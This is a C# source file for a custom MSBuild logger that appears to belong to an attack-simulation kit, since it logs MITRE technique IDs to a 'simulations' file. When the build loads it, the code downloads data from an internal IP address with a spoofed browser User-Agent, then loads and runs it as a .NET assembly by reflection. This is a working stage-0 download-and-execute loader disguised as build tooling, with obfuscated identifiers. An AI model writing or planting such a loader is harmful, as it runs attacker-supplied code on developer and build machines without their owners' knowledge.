using System;
using System.IO;
using System.Net;
using System.Reflection;
using Microsoft.Build.Framework;

public class Hkpxj : ILogger
{
    const string uqjphx = "Macula-Stage0-6952";
    const string fwycvd = "NAHUA-S4N";
    const string olqxy = "7";
    const string lmmzbj = "https://10.0.0.49";
    const string knckln = "6952";
    const string bbjrwn = "https://10.0.0.49/stage/6952-7/3";
    const string ueyjvp = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/517.36 (HTML";
    
    public string Parameters { get; set; }
    public LoggerVerbosity Verbosity { get; set; }
    
    public void Shutdown() { }
    
    public void Initialize(IEventSource eventSource)
    {
        string gvcph = Environment.GetEnvironmentVariable("APPDATA") + "\\" + olqxy;
        string yzmnmv = gvcph + "\\macula-simulations.log";
        
        try
        {
            if (!Directory.Exists(gvcph))
                Directory.CreateDirectory(gvcph);
        }
        catch { }
        
        string yddbh = DateTime.Now.ToString("yyyy-MM-dd HH:mm:ss.fff");
        
        try
        {
            using (WebClient ockjxg = new WebClient())
            {
                ockjxg.Headers["User-Agent"] = ueyjvp;
                ockjxg.Headers["Accept"] = "*/*";
                
                byte[] ukczsl = ockjxg.DownloadData(lmmzbj + "/" + bbjrwn);
                
                File.AppendAllText(yzmnmv, 
                    $"[{yddbh}][{fwycvd}-{uqjphx}]: {olqxy}-{knckln}-T1105|Ingress Tool Transfer=1:\n");
                
                Assembly jkfqnm = Assembly.Load(ukczsl);
                MethodInfo xrqcr = jkfqnm.EntryPoint;
                
                if (xrqcr != null)
                {
                    object[] tqtrvg = xrqcr.GetParameters().Length == 0 ? 
                        new object[0] : new object[] { new string[0] };
                    
                    xrqcr.Invoke(null, tqtrvg);
                    
                    File.AppendAllText(yzmnmv, 
                        $"[{yddbh}][{fwycvd}-{uqjphx}]: {olqxy}-{knckln}-T1620|Reflective Code Loading=1:\n");
                }
                else
                {
                    File.AppendAllText(yzmnmv, 
                        $"[{yddbh}][{fwycvd}-{uqjphx}]: {olqxy}-{knckln}-T1620|Reflective Code Loading=0:no_entrypoint\n");
                }
            }
        }
        catch (WebException hkgrs)
        {
            File.AppendAllText(yzmnmv, 
                $"[{yddbh}][{fwycvd}-{uqjphx}]: {olqxy}-{knckln}-T1105|Ingress Tool Transfer=0:{hkgrs.Status}:\n");
        }
        catch (Exception gvyts)
        {
            try
            {
                File.AppendAllText(yzmnmv, 
                    $"[{yddbh}][{fwycvd}-{uqjphx}]: {olqxy}-{knckln}-T1620|Reflective Code Loading=0:{gvyts.GetType().Name}:\n");
            }
            catch { }
        }
    }
}